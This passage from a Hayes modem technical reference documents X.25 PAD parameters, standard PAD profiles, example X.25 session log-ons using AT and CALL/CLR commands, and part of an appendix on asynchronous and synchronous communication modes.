+line feed character. + +Values Description +----------------------------------------------------------------------------- +0 No padding after line feed (factory setting) +1-255 Number of padding characters inserted after line feed + +Parameter 15 - Editing +Parameter 15 specifies whether or not editing is used in the PAD on-line +state. Parameters 16, 17, 18, and 19 describe the available editing functions. +If editing is enabled, parameter 4 (forward timing) and National Parameter 70 +are ignored. + +Values Description +----------------------------------------------------------------------------- +0 Editing disabled (factory setting) +1 Editing enabled. Data forwarding is suspended until the editing buffer + is full, or until the character defined by parameter 3 is received + +Whenever more data is received than can be held by the editing buffer, one +full packet will be forwarded. The remaining characters are placed in the +beginning of the editing buffer, and can still be edited. + +Parameter 16 - Character Delete +The defined delete character deletes the last character in the editing buffer. +After deleting the character, the PAD sends either a backslash (\) or + to the DTE (depending on the setting of parameter 19. If the editing +buffer is empty, then no response is sent. + +Values Description +----------------------------------------------------------------------------- +0-127 Selects which ASCII value functions as the delete character +8 Backspace character (factory setting) + +Parameter 17 - Line Delete +This parameter defines the line delete function. When the line delete +character is entered, the contents of the editing buffer are deleted. Unless +the editing buffer is empty, the PAD sends a result code (XXX for printing +terminals) to acknowledge the line delete function. + +Values Description +----------------------------------------------------------------------------- +0-127 ASCII value for delete character +24 Control-X (factory setting) + +Parameter 18 - Line Display +This parameter defines the line display function. If the user enters the +character specified by this parameter and editing is enabled, the contents of +the editing buffer will be displayed. + +Values Description +----------------------------------------------------------------------------- +0 Line display disabled +1-127 ASCII value of line display character +18 Control-R (factory setting) + +Parameter 19 - Editing PAD result codes +Parameter 19 provides the PAD information about the attached DTE (terminal or +printer). This ensures that the PAD sends the proper editing character +sequences. For example, on a printer, the character delete function simply +prints a backslash (\) for each printable character that is deleted, while a +terminal is sent a BS-SP-BS sequence to backspace the cursor and erase the +deleted character from the screen. + +The PAD uses editing PAD result codes for display terminals regardless of the +value of parameter 19 when bit 2 of S53 is set. + +Values Description +----------------------------------------------------------------------------- +0 Editing PAD result codes function disabled +1 Editing PAD result codes for printers +2 Editing PAD result codes for computers (factory setting) +8, 32-126 Editing PAD result codes using the character represented by the + ASCII value + +Parameter 20 - Echo Mask +Parameter 20 is bit-mapped and defines the set of characters that are to be +excluded from the echo function. Characters specified by bit value 64 are +masked only when editing is active. + +Values Description +----------------------------------------------------------------------------- +64 all characters, except editing characters, are echoed + (factory setting) +0-255 sum of bits selecting characters to be echoed + +Bit Values Description +----------------------------------------------------------------------------- +1 CR +2 LF +4 VT, HT, FF +8 BEL, BS +16 ESC, ENQ +32 ACK, NAK, STX, SOH, EOT, ETB, ETX +64 Parameters 16, 17, 18 (editing characters) +128 NUL, SO, SI, DLE, DC1, DC2, DC3, DC4, SYN, CAN, EM, SUB, FS, GS, + RS, US + +Parameter 21 - Parity Treatment +This parameter controls the parity and character format used by the terminal. + +Values Description +----------------------------------------------------------------------------- +0 No parity checking or generation (factory setting) +2 Parity is applied to data sent to the terminal according to the parity + specified by National parameter 71 + +Parameter 22 - Page Wait +Parameter 22 defines the number of lines (text separated by line feeds) that +are displayed before "PAGE" is displayed. No further data is transmitted to +the terminal until the user sends an XON character, sets parameter 22 to zero, +or escapes from the data transfer state (PAD recall). + +Values Description +----------------------------------------------------------------------------- +0 Page wait disabled (factory setting) +1-255 Number of line feed characters sent to the terminal before the page + wait condition + +National Parameter 70 - Streaming Data Forwarding +National Parameter 70 affects PAD data forwarding timing. When set to value 0, +the data forwarding timing is controlled by PAD parameter 4. When set to value +1, "streaming mode" is set. This parameter, among others, may be set to +configure a "streaming mode PAD" identical to that used in Error-Control/LAP-B +connections. + +In streaming mode, a character received by the PAD is placed in a packet +immediately, instead of being buffered until a timeout occurs. For example, +assuming the modem transmitter is idle, a character received by the PAD is +forwarded immediately. This packet remains "open" in case another character is +received by the PAD. The additional character can be added while the packet is +actually transmitting. + +The result is "instantaneous" forwarding, which generally results in the best +interactive performance. This may cause more packet traffic. This is no +problem in point-to-point connections, but may be of some concern for networks +that charge by the packet. + +Values Description +----------------------------------------------------------------------------- +0 PAD Parameter 4 controls data forwarding timeout (factory setting) +1 Streaming data forwarding timeout + +National Parameter 71 - Character Format +This parameter specifies the character format (number of data bits and parity) +required by the network for the PAD, and is used to generate the proper parity +on all PAD result codes and data delivered to the terminal. + +Individual networks specify particular settings for this parameter. Parameter +71 also determines whether or not all 8 data bits or only 7 data bits are +examined when testing characters for specific values (e.g., for CR or XOFF). + +Values Description +----------------------------------------------------------------------------- +0 Format/parity used on last AT command (factory setting) +1 8 data bits, no parity +2 7 data bits, odd parity +3 7 data bits, even parity +4 7 data bits, mark parity +5 7 data bits, space parity + +National Parameter 72 - Break Signal Timing +National Parameter 72 is used to control whether or not break timing +information via National Parameter 73 is sent with the indication of break PAD +message. + +In most PADs, when a break signal is received from the terminal, the PAD sends +an X.25 interrupt packet, followed by an indication of break PAD message. The +remote PAD will usually ignore the interrupt packet, and will transmit a break +signal to the remote system when the indication of break PAD message is +received. + +The duration of the break signal is normally fixed. National Parameter 73 +specifies the duration of the break signal transmitted by the PAD. If National +Parameter 72 is set to value 0, the indication of break PAD message is sent +normally, and will be compatible with all networks. + +If National Parameter 72 is set to value 1, break timing information is sent +along with the indication of break PAD message, by adding a parameter/value +field to the indication of break PAD message. This sets the remote PAD's +National Parameter 73 to a value that corresponds to the length of break as +timed by the local PAD, so the break signal transmitted by the local PAD is +very close to the length of the break signal received by the remote PAD. + +Setting National Parameter 72 to value 1 could possibly confuse some networks, +and should be used only in cases where you know that the remote PAD supports +National Parameter 73. + +Values Description +----------------------------------------------------------------------------- +0 No break timing information sent with signal (factory setting) +1 Break timing information is sent with the break signal + +National Parameter 73 - Break Signal Duration +This parameter is used to set the duration of a break signal transmitted by +the PAD in increments of 10 milliseconds. The factory setting is 18 (180 +msec.). National Parameter 73 is usually set by the remote PAD, if the remote +PAD supports National Parameter 72. + +Values: 0-255 +---------------------------------- +Factory Setting: 18 (180 msec) + +National Parameter 74 - Disable PAD Parameter Setting by the Remote PAD +The remote system may try to re-configure the parameter settings of the local +PAD (capability also available to the local modem user with the RSET command) +to facilitate communications. However, doing this may not be the best +configuration for your terminal. Register S57 allows you to disable the remote +PAD's ability to change your PAD parameter settings. + +Values Description +----------------------------------------------------------------------------- +0 Remote PAD can reset your PAD parameters (factory setting) +1 All set or set and read PAD messages return the INV result code to + the remote system indicating that the parameter value cannot be + altered from the current setting. + +National Parameter 100 - Default Maximum Packet Size +This parameter sets the default maximum packet size according to the following +parameter value-to-packet size (in bytes) conversions: + +Values Description +------------------------------------ +4 16 bytes +5 32 bytes +6 64 bytes +7 128 bytes (factory setting) +8 256 bytes +9 512 bytes + +National Parameter 101 - Default Maximum Window Size +This parameter sets the default maximum window size. + +Values: 2-7 +Factory Setting: 2 + +National Parameter 102 - Call Request Response Timer +This parameter sets the maximum amount of time the transmitter should wait for +acknowledgment to a call request packet before initiating recovery procedure, +in 10-second increments. + +Values: 1-255 +Factory Setting: 20 (200 seconds) + +National Parameter 103 - Reset Request Response Timer +This parameter sets the maximum amount of time the transmitter should wait for +acknowledgment to a reset request packet before initiating recovery procedure, +in 10-second increments. + +Values: 1-255 +Factory Setting: 18 (180 seconds) + +National Parameter 104 - Clear Request Response Timer +This parameter sets the maximum amount of time the transmitter should wait for +acknowledgment to a clear request packet before initiating recovery procedure, +in 10-second increments. + +Values: 1-255 +Factory Setting: 18 (180 seconds) + +National Parameter 105 - Interrupt Response Time +This parameter sets the maximum amount of time the transmitter should wait for +acknowledgment to an interrupt packet before initiating recovery procedure, in +10-second increments. + +Values: 1-255 +Factory Setting: 18 (180 seconds) + +National Parameter 106 - Reset Request Retransmission Counter +This parameter defines the maximum number of times a reset request packet +should be retransmitted. + +Values: 0-255 +Factory Setting: 1 retransmission + +National Parameter 107 - Clear Request Retransmission Counter +This parameter defines the maximum number of times a clear request packet +should be retransmitted. + +Values: 0-255 +Factory Setting: 1 retransmission + +National Parameter 108 - Channel Allocation Parameter +This parameter is used to inform the PAD how the application software or user +intends to use the current PAD channel. There are four possible settings. + +Values Description +----------------------------------------------------------------------------- +0 Unavailable - the PAD channel will not be used; outgoing calls are not + allowed, and incoming calls will be directed to incoming or free + channels, or cleared +1 Outgoing - the PAD channel will be used for an outgoing call; incoming + calls will be directed to incoming or free channels, or cleared +2 Incoming - the PAD channel will be used for an incoming call; outgoing + calls are not allowed; the PAD will assign an incoming call to PAD + channels assigned as incoming before those assigned as bi-directional +3 Bi-directional - the PAD channel can be used for incoming or outgoing + calls; incoming calls will be directed to free channels if no incoming + channels are available (factory setting) + + +***************************************************************************** +2.3 PAD Profiles +For many X.25 connections, the PAD can be used without any changes to its +factory configuration. For information on creating, saving, and recalling PAD +profiles, see the PROF command. The four standard profiles are listed below. + +Factory-Set Profile + +PAD Values Description Default +Param. +----------------------------------------------------------------------------- +1 0-126 PAD recall using a character 0 (disabled) +2 0,1 Echo 0 (disabled) +3 0-127 Selection of data forwarding signal 0 (disabled) +4 0-255 Selection of idle timer delay 1 (50 msec timeout) +5 0,1,2 Ancillary device control 0 (XON/XOFF disabled) +6 0,1,4,5 Control of PAD result codes 5 (standard PAD result) +7 1,2,4,8,16 Response to break from terminal l5 (send interrupt and + break indication) +8 0,1 Discard output 0 (normal delivery) +9 0-255 Padding after carriage return 0 (disabled) +10 0-255 Line folding 0 (disabled) +11 0,2-5,12-16 Terminal speed (speed of terminal + indicated) +12 0,1 Flow control of PAD by terminal 0 (XON/XOFF disabled) +13 0-7 Linefeed insertion after CR 0 (disabled) +14 0-255 Linefeed padding 0 (disabled) +15 0,1 Editing 0 (disabled) +16 0-127 Character delete 8 (BS) +17 0-127 Line delete 24 (CAN, ^X) +18 0-127 Line display 18 (DC2, ^R) +19 0,1,2,8, + 32-126 Editing PAD result codes 2 (display terminals) +20 0-255 Echo mask 64 (echo all characters + except editing + characters) +21 0,2 Parity treatment 0 (disabled) +22 0-255 Page wait 0 (disabled) +70* 0,1 Streaming data forwarding 0 (disabled) +71* 0,5 Character format 0 (set by AT autobaud) +72* 0,1 Break signal timing 0 (disabled) +73* 0-255 Break signal duration 18 (180 msec) +74* 0,1 Disable PAD parameter settings by 0 (parameters set + remote PAD by remote PAD) +100* 4-9 Default packet size 7 (128 bytes) +101* 2-7 Default window size 2 (2 outstanding + packets) +102* 1-255 T21 call request response timer 20 (200 seconds) +103* 1-255 T22 reset request response timer 18 (180 seconds) +104* 1-255 T23 clear request response timer 18 (180 seconds) +105* 1-255 T26 interrupt response timer 18 (180 seconds) +106* 0-255 R22 reset request retransmission 1 retransmission +107* 0-255 R23 clear request retransmission 1 retransmission +108* 0-3 Channel allocation parameter 3 (normal channel + allocation) + +*National Parameters + +CCITT Simple Standard Profile + +PAD Values Description Default +Param. +----------------------------------------------------------------------------- +1 0-126 PAD recall using a character 1 (DLE character) +2 0,1 Echo 1 (echo on) +3 0-127 Selection of data forwarding 126 (forward on control + signal characters + and DEL) +4 0-255 Selection of idle timer delay 0 (no timeout) +5 0,1,2 Ancillary device control 1 (XON/XOFF enabled) +6 0,1,4,5 Control of PAD result codes 1 (standard PAD result + codes enabled, no prompt) +7 1,2,4,8,16 Response to break from terminal 2 (send reset packet) +8 0,1 Discard output 0 (normal delivery) +9 0-255 Padding after carriage return 0 (disabled) +10 0-255 Line folding 0 (disabled) +11 0,2-5,12-16 Terminal speed (speed of terminal + indicated) +12 0,1 Flow control of PAD by terminal 1 (XON/XOFF disabled) +13 0-7 Linefeed insertion after CR 0 (disabled) +14 0-255 Linefeed padding 0 (disabled) +15 0,1 Editing 0 (disabled) +16 0-127 Character delete 127 (DEL character) +17 0-127 Line delete 24 (CAN, ^X) +18 0-127 Line display 18 (DC2, ^R) +19 0,1,2,8, + 32-126 Editing PAD result codes 1 (printing terminals) +20 0-255 Echo mask 0 (echo all characters) +21 0,2 Parity treatment 0 (disabled) +22 0-255 Page wait 0 (disabled) +70* 0,1 Streaming data forwarding 0 (disabled) +71* 0,5 Character format 0 (set by AT autobaud) +72* 0,1 Break signal timing 0 (disabled) +73* 0-255 Break signal duration 18 (180 msec.) +74* 0,1 Disable PAD parameter settings 0 (parameters set by by + remote PAD remote PAD) +100* 4-9 Default packet size 7 (128 bytes) +101* 2-7 Default window size 2 (2 outstanding packets) +102* 1-255 T21 call request response timer 20 (200 seconds) +103* 1-255 T22 reset request response timer 18 (180 seconds) +104* 1-255 T23 clear request response timer 18 (180 seconds) +105* 1-255 T26 interrupt response timer 18 (180 seconds) +106* 0-255 R22 reset request retransmission 1 retransmission +107* 0-255 R23 clear request retransmission 1 retransmission +108* 0-3 Channel allocation parameter 3 (normal channel + allocation) +*National Parameters + + +CCITT Transparent Standard Profile + +PAD Values Description Default +Param. +----------------------------------------------------------------------------- +1 0-126 PAD recall using a character 0 (disabled) +2 0,1 Echo 0 (disabled) +3 0-127 Selection of data forwarding signal 0 (disabled) +4 0-255 Selection of idle timer delay 20 (1 sec.timeout) +5 0,1,2 Ancillary device control 0 (XON/XOFF disabled) +6 0,1,4,5 Control of PAD result codes 0 (disabled) +7 1,2,4,8,16 Response to break from terminal 2 (send reset packet) +8 0,1 Discard output 0 (normal delivery) +9 0-255 Padding after carriage return 0 (disabled) +10 0-255 Line folding 0 (disabled) +11 0,2-5,12-16 Terminal speed (speed of terminal + indicated) +12 0,1 Flow control of PAD by terminal 0 (XON/XOFF disabled) +13 0-7 Linefeed insertion after CR 0 (disabled) +14 0-255 Linefeed padding 0 (disabled) +15 0,1 Editing 0 (disabled) +16 0-127 Character delete 127 (DEL) +17 0-127 Line delete 24 (CAN, ^X) +18 0-127 Line display 18 (DC2, ^R) +19 0,1,2,8, + 32-126 Editing PAD result codes 1 (printing terminals) +20 0-255 Echo mask 0 (echo all + characters) +21 0,2 Parity treatment 0 (disabled) +22 0-255 Page wait 0 (disabled) +70* 0,1 Streaming data forwarding 0 (disabled) +71* 0,5 Character format 0 (set by AT autobaud) +72* 0,1 Break signal timing 0 (disabled) +73* 0-255 Break signal duration 18 (180 msec.) +74* 0,1 Disable PAD parameter settings 0 (parameters set + by remote PAD by remote PAD) +100* 4-9 Default packet size 7 (128 bytes) +101* 2-7 Default window size 2 (2 outstanding + packets) +102* 1-255 T21 call request response timer 20 (200 seconds) +103* 1-255 T22 reset request response timer 18 (180 seconds) +104* 1-255 T23 clear request response timer 18 (180 seconds) +105* 1-255 T26 interrupt response timer 18 (180 seconds) +106* 0-255 R22 reset request retransmission 1 retransmission +107* 0-255 R23 clear request retransmission 1 retransmission +108* 0-3 Channel allocation parameter 3 (normal channel + allocation) +*National Parameters + + +Error-Control/LAP-B Profile + +PAD Values Description Default +Param. +----------------------------------------------------------------------------- +1 0-126 PAD recall using a character 0 (disabled) +2 0,1 Echo 0 (disabled) +3 0-127 Selection of data forwarding signal 0 (disabled) +4 0-255 Selection of idle timer delay 0 (no timeout) +5 0,1,2 Ancillary device control 0 (XON/XOFF disabled) +6 0,1,4,5 Control of PAD result codes 0 (no PAD result + codes) +7 1,2,4,8,16 Response to break from terminal 5 (send interrupt and + break indication) +8 0,1 Discard output 0 (normal delivery) +9 0-255 Padding after carriage return 0 (disabled) +10 0-255 Line folding 0 (disabled) +11 0,2-5,12-16 Terminal speed Ð (speed of terminal + indicated) +12 0,1 Flow control of PAD by terminal 0 (XON/XOFF disabled) +13 0-7 Linefeed insertion after CR 0 (disabled) +14 0-255 Linefeed padding 0 (disabled) +15 0,1 Editing 0 (disabled) +16 0-127 Character delete 8 (BS) +17 0-127 Line delete 24 (CAN, ^X) +18 0-127 Line display 18 (DC2, ^R) +19 0,1,2,8, + 32-126 Editing PAD result codes 2 (display terminals) +20 0-255 Echo mask 64 (echo all + characters except + editing characters) +21 0,2 Parity treatment 0 (disabled) +22 0-255 Page wait 0 (disabled) +70* 0,1 Streaming data forwarding 1 (streaming mode + selected) +71* 0,5 Character format 0 (set by AT autobaud) +72* 0,1 Break signal timing 1 (time break signal) +73* 0-255 Break signal duration 18 (180 msec) +74* 0,1 Disable PAD parameter settings 0 (parameters set + by remote PAD by remote PAD) +100* 4-9 Default packet size 7 (128 bytes) +101* 2-7 Default window size 2 (2 outstanding + packets) +102* 1-255 T21 call request response timer 20 (200 seconds) +103* 1-255 T22 reset request response timer 18 (180 seconds) +104* 1-255 T23 clear request response timer 18 (180 seconds) +105* 1-255 T26 interrupt response timer 18 (180 seconds) +106* 0-255 R22 reset request retransmission 1 retransmission +107* 0-255 R23 clear request retransmission 1 retransmission +108* 0-3 Channel allocation parameter 3 (normal channel + allocation) +*National Parameters + + +***************************************************************************** +2.4 Typical X.25 Scenarios +The examples below provide scenarios of typical activities you might perform +and/or experience with X.25 connections. Each one provides the "Activity," a +reference to a command description within this document for further +discussion, the "Result" of the "Activity," and an "Example Log-on" when +applicable. These examples may be helpful as reference when you are writing +sequences for users, or when developing software. + +Synopsis of a Communication Session with a Packet Switched Network +The events in a typical X.25 communication session are detailed below. + +Establishing a Network Connection... +X.25 connections begin the same as point-to-point connections - with a modem +call to a remote system. Once connected to the network, however, you use the +PAD to make one or more virtual connections to other nodes on the network. + +Making a Virtual Connection... +The following procedure explains the steps for the major activities in X.25 +communications. + +Step 1: Configuring the modem for X.25. +Before placing a call to the network, you must configure the modem to make an +X.25 connection. First, enter the modem's command state + +Issue AT&Q5S44=3S46=6S48=0 . This command string verifies that the modem +is in the error-control mode (&Q5) and sets the values of three S-Registers +that control the modem's feature negotiation. S48=0 controls the negotiation +process; S46=6 stipulates an X.25 connection. Now, instead of negotiating a +V.42 connection, the modem attempts connections using the X.25 protocol. + +Step 2: Calling the network. +Next, dial the number of the network to which you subscribe. This is a +standard modem call made with the D command: ATDT9,555-1234 (for +example). If the call is successful, the modem will connect and issue a result +code sequence. The carrier and connect messages you receive depend on the +connection. If you want to see the extended messages, you must issue the W1 +command. With this feature enabled, for a 2400 bps connection, the messages +will be CARRIER 2400 PROTOCOL: X.25/LAP-B CONNECT 4800. The PAD automatically +enters the command state for channel 1. + +Step 3: Making a virtual connection to the remote system. +To establish a virtual call to a user on the network, you must have the +network address of the other node to which you wish to connect and any other +information required by the network. For example, to connect to a service on +the network, you would issue: CALL R-3110 20200202 - CALL is the command +for initiating connections with a remote system. The (R) command permits +reverse charging if the user at the other end of the virtual connection +requests it. 3110 is a network ID code and 20200202 is the destination +address. If the call is accepted by the remote system, the network will return +the result code sequence: CON COM: W2:2,P7:7,X0277 COM. The PAD then enters +the data transfer state. If the call is not accepted, the network returns a +response such as CLR DTE 157 FAC: (followed by network information as +alphanumeric characters X000...). The PAD remains in the PAD command state. + +Step 4: Performing on-line activities +Once connected, you can perform desired communications - file transfers, +interactive typing, etc. + +Step 5: Clearing the call +When ready to end the session, issue CTRL-P to return to the channel's command +state. Then issue CLR . This clears the current virtual connection. The +network responds with CLR CONF FAC: (followed by network information as +alphanumeric characters X000...). + +Note: All virtual calls should be cleared before returning to the AT command +state. + +Step 6: Exiting the PAD +EXIT - Leaves PAD command state and enters the AT command state. + +Step 7: Terminating the network connection +ATH0 - Breaks the physical connection to the network node. This action +hangs up the telephone, in the same way other communication sessions are +terminated. + +Establishing a Virtual Connection +The example log-on and results below illustrate a successful attempt to +establish a virtual connection. + +Activity: User dials CompuServe(TM), connects, then issues CALL command to + establish a virtual connection. Call is accepted +Refer to: CALL command description +Result: Call is accepted. Depending on the network requirements, the + modem sends back the following: + CON
COM + + Note: The data in capital letters is sent to you; the data in + angle brackets may or may not be sent to you. + +Example Log-on: User calls Telenet(TM) and issues CALL command to go on-line + with CompuServe: + + Enter AT&Q5 S44=3 S46=6 S48=0 W1 DT 9,5550123 + Result CARRIER 2400 + PROTOCOL: X.25/LAP-B + CONNECT 2400 + + Enter CALL R-311020200202 + Result CON COM: W2:2,P7:7,X 0277 COM + +Attempting a Virtual Connection that is not Accepted +This scenario depicts an unsuccessful attempt at establishing a virtual +connection. For various reasons, the connection may not be completed. The +reason(s) will be provided in result codes generated by the PAD. + +Activity: User dials packet-switched network, connects, then issues CALL + command to establish a virtual connection, but call is not + accepted. +Refer to: CALL command description. +Result: Call is not accepted. Depending on the network requirements, + the modem returns the following result codes: + CLR
+ +Example Log-on: User calls Telenet and issues CALL command to go on-line + with CompuServe: + + Enter AT&Q5 S44=3 S46=6 S48=0 W1 DT 9,5550123 + Result CARRIER 2400 + PROTOCOL: X.25/LAP-B + CONNECT 2400 + + Enter CALL R-311020200202 + Result CLR DTE 157 FAC: + X0000C10400000000C208080000000100000062 + +Resetting a Virtual Channel +While on-line to another user on the network, if the escape sequence is used +to return to the PAD command state, the channel will be reset. + +Activity: User is connected to an packet-switched network, has established + a virtual connection, then escapes to the PAD command state and + resets the virtual channel +Refer to: RESET command description +Result: The PAD resets the virtual channel and returns the following + information to the user: + RESET + +Example Log-on: n/a + + +Resetting a Virtual Channel a by Remote PAD +As a result of network activity, the remote PAD may reset a virtual channel. +If this occurs, data may be lost. The call must also be re-established. + +Activity: User is connected to a packet-switched network, has established a + virtual connection, and the network resets the virtual channel +Refer to: RESET command description +Result: The PAD resets the virtual channel and returns the following + information to the user: + RESET + +Example Log-on: n/a + + +Clearing a Virtual Channel +This scenario is the typical way to end a virtual call following a session. +This is also the process to use when other calls are to be maintained. + +Activity: User is connected to a packet-switched network, has established a + virtual connection, escapes to PAD command state, and clears the + call. +Refer to: CLR command description. +Result: The PAD clears the call, sets all PAD parameters back to their + values prior to establishing the virtual connection, and returns + the following result codes: + CLR CONF FAC: X 00 00 C1 04 00 00 01 03 C2 08 00 00 00 + 08 80 00 00 04 + +Example Log-on: User calls Telenet and issues CALL command to go on-line + with CompuServe: + + Enter AT&Q5 S44=3 S46=6 S48=0 W1 DT 9,5550123 + Result CARRIER 2400 + PROTOCOL: /X.25 + CONNECT 2400 + + Enter CALL R-311020200202 + Result CON W2:2,P7:7,X 0277, COM + + Enter User ID: + Result * + + Enter Ctrl-P to return to the PAD command state + Result CLR CONF FAC: + X0000C104000000103C208000000008800000004 + +Accepting a Request from Remote PAD to Establish Virtual Connection +A request from a remote PAD to establish a virtual connection will be received +when another network user is attempting to make a connection with you. +Although the standard response is to accept, be aware that accepting the +request, you may be accepting certain network charges other than packet +transmission fees. + +Activity: User using modem and receives request from remote unit to + establish a virtual connection +Refer to: ACC command description +Result: The remote PAD sends the following result code to the user + IC COM + +Example Log-on: n/a + + +Clear Command Failed +This scenario describes a request to clear a channel denied by the PAD. This +may occur because the modem is transferring data. + +Activity: User is connected to a packet-switched network, has established a + virtual connection, escapes to PAD command state, but call fails + to be cleared +Refer to: CLR command description +Result: The PAD sends the following result code: CLR FAILED + +Example Log-on: n/a + + +Link Restart Occurs +The example result code below indicates that the virtual links have been +dropped. The connections must be re-established. + +Activity: A "link restart" is a major error condition in which all virtual + calls are disconnected and the virtual channels return to "start" + mode +Example: LINK RESTARTED + + +============================================================================== +Appendix A: +Communication Options +This appendix describes the various methods of communication supported by +Hayes modems. Set up recommendations for each of these modes are provided. +Flow diagrams illustrate the states and conditions through which the modem +passes in each mode. Setup examples and environment descriptions are also +included. + + +***************************************************************************** +A.1 Transmission and DTE Types +Modems communicate over the telephone line by converting data from analog to +digital form and vice versa. The techniques used are fundamentally the same +whether the data transmission mode is synchronous or asynchronous. + +In most cases, communications over the telephone lines will be synchronous, +regardless of the mode selected. The interface between the modem and the DTE +will depend on the mode selected. 300 bps communications (for example when on- +line with a Smartmodem 300) are always asynchronous between modems. At speeds +of 1200 bps and higher, the modem-to-modem links are always synchronous. + +However, between the DTE and the modem, synchronous and asynchronous +communication differ significantly. The DTE hardware and software are usually +different as well. A modem operating with a synchronous DTE could connect to +another modem operating with an asynchronous DTE, as the carrier signals are +no different. But the data passed over the link might not be intelligible to +their respective computers. + +The interface between the modem and the DTE is generally asynchronous for all +personal computer-to-modem communications. When the modem-to-DTE link is +synchronous, the DTE must be a synchronous device such as a synchronous +adapter card installed within the computer. The two types of transmission +differ in the techniques used to separate the characters that are transmitted. +Asynchronous transmissions use bits to indicate the start and stop of the +character. Synchronous transmissions use clocking signals. + +Hayes modems provide several communication modes to adapt to a variety of +environments and operating demands. When a communications mode is selected +that supports an asynchronous DTE at 1200 bps or greater, the modem converts +the asynchronous data into synchronous data that is compatible with the modem- +to-modem carrier signals. In some of the communications modes that support +asynchronous DTEs, the start and stop bits are also converted to synchronous +data over the modem-to-modem link. Naturally, the modems on both ends of the +link must be in a compatible communications mode if the data is to be restored +at the receiving DTE. For this reason, communications modes that support +asynchronous DTEs and which actually send the start and stop bits over the +modem-to-modem link are often referred to as asynchronous connections. + +The communications mode is controlled by the &Q command, except for Smartmodem +300 and those Smartmodem 1200s that support only asynchronous mode. This +command is discussed fully in the next section. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +A.1.1 Asynchronous Transmissions +Most communications between PCs are asynchronous. Asynchronous transmissions +pass data between the modems as characters. Data is then transmitted as +character bits framed by start, stop, and parity bits to mark the beginning +and end of character units. + +The use of parity bits is optional depending on the asynchronous character +format selected. + +When sending and receiving data, the modem supports the following asynchronous +character formats: + +Start Bits Data Bits Parity Stop Bits +----------------------------------------------- +1 7 even/odd 1 or more +1 7 none 2 +1 7 mark/space 1 or more +1 8 none 1 or more + +At speeds of 1200 bps or higher, the modem always generates data in a 10-bit +format, including the start bit. In the modem command state, information +exchanged between the DTE and modem consists of commands and responses that +are not transmitted or received over the phone line. The character formats +supported by a particular modem are provided in the Installation Guide +accompanying the modem, under the feature list. + ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +A.1.2 Synchronous Transmissions +Synchronous communication is a specialized form of data transmission and +generally requires special hardware and software combinations. When operating +in a synchronous mode, the modem functions as a pipeline, sending bits across +the link between modems according to uniform blocks of time. + +Communication is managed through special protocols. Though techniques differ +slightly, synchronous protocols assemble data in frames prior to transmission +and disassemble the frames on arrival. If the communication environment +supports synchronous communication, the framing - data formatting - is +performed by the communications software. No data format selection is required +of the modem for synchronous operation. + +Synchronous modes 1, 2, 3, and 4 are supported by standalone (external) +modems. Hayes boardlevel (internal) modems support synchronous communications +with mode 4, Hayes AutoSync. The only exceptions are the modems designed for +the Apple(TM) Macintosh(TM) II family: Smartmodem 2400M and V-series +Smartmodem 2400M. The Macintosh II, unlike other personal computers, supports +both asynchronous and synchronous communications without an adapter card. If a +personal computer (an IBM(TM) PC XT(TM), for example) has a synchronous +adapter card installed, then a Hayes standalone Smartmodem or V-series System +Products that support modes 1, 2, or 3, may be used for synchronous +communications. + + +***************************************************************************** +A.2 Communication Modes - &Q +The requirements of the communication link - including the software that +addresses the modem and the capabilities of the local and remote modems - +determine the mode to be used. For example, there are three modes for +asynchronous DTEs (&Q0, &Q5, and &Q6) and three modes for synchronous DTEs +(&Q1, &Q2, and &Q3). Most PC communications are performed in the asynchronous +mode. Unless the modem is installed on a terminal, or computer with +synchronous capability, or connected to a mainframe, communication will most +likely be asynchronous. + +For those situations such as mainframe connections, the modem can be +configured for synchronous modes. Synchronous communication requires special +hardware in all but Mode 4. In all synchronous modes, special software that +provides the necessary protocol is required. Synchronous communication +requires that the DTE (either the personal computer/data terminal or the port +on the host computer) be able to exercise some degree of control over DTR. +When the modem is operating in synchronous modes 1, 2, or 3, the modem's +response to DTR transitions as specified by the &D command are significantly +different than responses to changes in DTR when the modem is in asynchronous +modes 0, 5, or 6. Modes 1, 2, and 3 are based on the 108.1 application of the +CCITT Recommendation V.24 that specifies series interchange circuit +designations. This alternative, "Connect Data Set (modem) To Line," is very +similar to EIA/TIA-232-D (a revised version of RS 232-C). + +Mode 4: AutoSync is the Hayes alternative for synchronous communication from a +personal computer. Originally developed to afford Hayes internal modems for +IBM PC XTs a means of communicating with synchronous computers (mainframes +such as IBM 3090 models), this feature was added to standalone modems as well. +Using a personal computer and software incorporating the Hayes Synchronous +Interface (HSI) software, the modem can be used synchronously from most +asynchronous serial computer ports. + +The factory default setting is &Q0 (asynchronous mode) for Smartmodem +Products, and &Q5 (error-control mode) for V-series System Products. When a +Hayes V-series System Product attempts an error-control connection with a +remote modem that cannot perform error-control, the V-series System Product +can either fall back to a connection supported by the other modem or hangup, +depending on the value of S36. When the use of &Q5 results in an error-control +connection, the DTE asynchronous data is converted to synchronous data. The +start and stop bits are discarded over the modem-to-modem link where the data +is encapsulated by a synchronous framing protocol that the DTE cannot see. The +specific type of synchronous framing (error-control protocol) that is used is +determined by registers S36, S46, and S48. When a V-series System Product +connects to a Smartmodem 1200 attached to a V-series Modem Enhancer, a special +Asynchronous Framing Technique (AFT) is used when an error-control link is +established (AFT preserves the start and stop bits in the modem-to-modem +link.) + +The &Q0 and &Q6 modes also convert the asynchronous DTE's start and stop bits +to synchronous data in the modem-to-modem link, so that those modes are +compatible at each end of the same modem connection. The &Q6 mode, however, +permits the DTE to operate at a faster speed than the modem link by using +buffers in the modem and bi-directional local flow control between the modem +and the DTE. The &Q0 mode utilizes the CCITT V.14 standard stop bit +manipulation feature to accommodate the slight speed discrepancies that can +occur between a modem and a DTE that are operating at the same nominal speed. + +The chart below lists the &Q command options currently defined for selection +of communication mode. Details on these modes are provided in subsequent +sections. + +Command Definition +----------------------------------------------------------------------------- +&Q0 Asynchronous mode - standard personal computer connection; call + placement and connection are both asynchronous. Basic setup + permitting interaction with the modem in either the command or the + on-line states. + +&Q1 Synchronous Mode 1 - call placement takes place using asynchronous + DTE, then modem switches to synchronous DTE when the connection is + fully established. The switchover time is controlled by register S25. + +&Q2 Synchronous Mode 2 - dial stored number under control of the DTR + interface circuit of a synchronous DTE. The use of an asynchronous + DTE in command state is optional. + +&Q3 Synchronous Mode 3 - dial manually using the DTR (V.24 108.2) + interchange circuit to switch between voice and data modes. + Requires telephone to dial while in the voice mode. The use of an + asynchronous DTE in command state is optional. + +&Q4 Hayes AutoSync - call placement takes place using asynchronous DTE, + then modem switches to 